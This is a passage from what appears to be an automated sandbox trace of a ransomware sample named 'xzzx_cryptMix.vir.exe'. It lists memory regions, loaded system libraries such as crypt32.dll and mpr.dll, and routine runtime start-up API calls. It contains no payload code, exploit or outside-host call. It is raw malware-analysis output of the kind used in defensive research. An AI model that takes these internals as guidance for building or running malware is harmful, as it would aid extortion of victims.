filename = "" Region: id = 2480 start_va = 0x33c0000 end_va = 0x33c0fff entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 2481 start_va = 0x33d0000 end_va = 0x33d0fff entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 2482 start_va = 0x33e0000 end_va = 0x33e0fff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 2483 start_va = 0x33f0000 end_va = 0x33f0fff entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 2484 start_va = 0x3400000 end_va = 0x3400fff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2485 start_va = 0x3410000 end_va = 0x3410fff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 2486 start_va = 0x3420000 end_va = 0x3420fff entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 2487 start_va = 0x3430000 end_va = 0x3430fff entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 2488 start_va = 0x3440000 end_va = 0x3440fff entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 2489 start_va = 0x3450000 end_va = 0x3450fff entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 2490 start_va = 0x3460000 end_va = 0x3460fff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 2491 start_va = 0x3470000 end_va = 0x3470fff entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 2492 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 2493 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 2495 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2498 start_va = 0x3490000 end_va = 0x34cffff entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 2499 start_va = 0x34d0000 end_va = 0x35cffff entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 2500 start_va = 0x7ef9e000 end_va = 0x7efa0fff entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 2501 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2502 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2503 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2504 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2512 start_va = 0x35d0000 end_va = 0x360ffff entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2513 start_va = 0x3610000 end_va = 0x370ffff entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2514 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 2515 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2516 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2517 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2524 start_va = 0x3710000 end_va = 0x374ffff entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 2525 start_va = 0x3750000 end_va = 0x384ffff entry_point = 0x0 region_type = private name = "private_0x0000000003750000" filename = "" Region: id = 2526 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 2527 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2528 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2529 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2536 start_va = 0x3850000 end_va = 0x388ffff entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 2537 start_va = 0x3890000 end_va = 0x398ffff entry_point = 0x0 region_type = private name = "private_0x0000000003890000" filename = "" Region: id = 2538 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 2539 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2540 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2544 start_va = 0x3990000 end_va = 0x39cffff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 2545 start_va = 0x39d0000 end_va = 0x3acffff entry_point = 0x0 region_type = private name = "private_0x00000000039d0000" filename = "" Region: id = 2546 start_va = 0x7ef92000 end_va = 0x7ef94fff entry_point = 0x0 region_type = private name = "private_0x000000007ef92000" filename = "" Region: id = 2547 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2548 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2549 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2557 start_va = 0x3ad0000 end_va = 0x3b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 2558 start_va = 0x3b10000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b10000" filename = "" Region: id = 2559 start_va = 0x7ef8f000 end_va = 0x7ef91fff entry_point = 0x0 region_type = private name = "private_0x000000007ef8f000" filename = "" Region: id = 2560 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2561 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2562 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2563 start_va = 0x3c10000 end_va = 0x3c4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c10000" filename = "" Region: id = 2564 start_va = 0x3c50000 end_va = 0x3d4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c50000" filename = "" Region: id = 2565 start_va = 0x7ef8c000 end_va = 0x7ef8efff entry_point = 0x0 region_type = private name = "private_0x000000007ef8c000" filename = "" Region: id = 2566 start_va = 0x3480000 end_va = 0x3480fff entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2592 start_va = 0x3d50000 end_va = 0x3d8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 2593 start_va = 0x3d90000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 2594 start_va = 0x3e90000 end_va = 0x3ecffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 2595 start_va = 0x3ed0000 end_va = 0x3fcffff entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 2596 start_va = 0x3fd0000 end_va = 0x40cffff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 2597 start_va = 0x40d0000 end_va = 0x410ffff entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2598 start_va = 0x4110000 end_va = 0x420ffff entry_point = 0x0 region_type = private name = "private_0x0000000004110000" filename = "" Region: id = 2599 start_va = 0x746f0000 end_va = 0x74740fff entry_point = 0x7471988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 2600 start_va = 0x7ef83000 end_va = 0x7ef85fff entry_point = 0x0 region_type = private name = "private_0x000000007ef83000" filename = "" Region: id = 2601 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 2602 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 2603 start_va = 0x4350000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x0000000004350000" filename = "" Region: id = 2604 start_va = 0x75ef0000 end_va = 0x7600cfff entry_point = 0x75ef158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2605 start_va = 0x76010000 end_va = 0x7601bfff entry_point = 0x7601238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2606 start_va = 0x746d0000 end_va = 0x746e1fff entry_point = 0x746d0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Thread: id = 203 os_tid = 0x548 [0083.891] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x350e1400, dwHighDateTime=0x1d35d7b)) [0083.891] GetCurrentProcessId () returned 0x544 [0083.891] GetCurrentThreadId () returned 0x548 [0083.891] GetTickCount () returned 0x3ffc [0083.891] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=74418564) returned 1 [0083.891] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x55834233)) [0083.891] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.892] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75ce0000 [0083.892] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsAlloc") returned 0x75cf4f2b [0083.892] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsGetValue") returned 0x75cf1252 [0083.892] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsSetValue") returned 0x75cf4208 [0083.892] GetProcAddress (hModule=0x75ce0000, lpProcName="FlsFree") returned 0x75cf359f [0083.893] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75ce0000 [0083.894] GetCurrentThreadId () returned 0x548 [0083.894] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5582f736, hStdOutput=0x5582fa6f, hStdError=0x2c07d0)) [0083.894] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.894] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.894] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.894] SetHandleCount (uNumber=0x20) returned 0x20 [0083.894] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\" " [0083.894] GetEnvironmentStringsW () returned 0x30ccb8* [0083.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0083.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x2c11f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1409 [0083.894] FreeEnvironmentStringsW (penv=0x30ccb8) returned 1 [0083.894] GetLastError () returned 0x65b [0083.894] SetLastError (dwErrCode=0x65b) [0083.894] GetLastError () returned 0x65b [0083.894] SetLastError (dwErrCode=0x65b) [0083.895] GetLastError () returned 0x65b [0083.895] SetLastError (dwErrCode=0x65b) [0083.895] GetACP () returned 0x4e4 [0083.895] GetLastError () returned 0x65b [0083.895] SetLastError (dwErrCode=0x65b) [0083.895] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.895] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0083.895] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0083.895] GetLastError () returned 0x65b [0083.895] SetLastError (dwErrCode=0x65b) [0083.895] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.895] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.895] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0083.895] GetLastError () returned 0x65b [0083.895] SetLastError (dwErrCode=0x65b) [0083.895] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.895] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띗㙂䱳喃Ā") returned 256 [0083.895] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띗㙂䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0083.895] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띗㙂䱳喃Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0083.895] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿçÖ¸1\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.895] GetLastError () returned 0x65b [0083.895] SetLastError (dwErrCode=0x65b) [0083.895] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.895] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띗㙂䱳喃Ā") returned 256 [0083.895] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띗㙂䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0083.895] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ띗㙂䱳喃Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0083.895] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 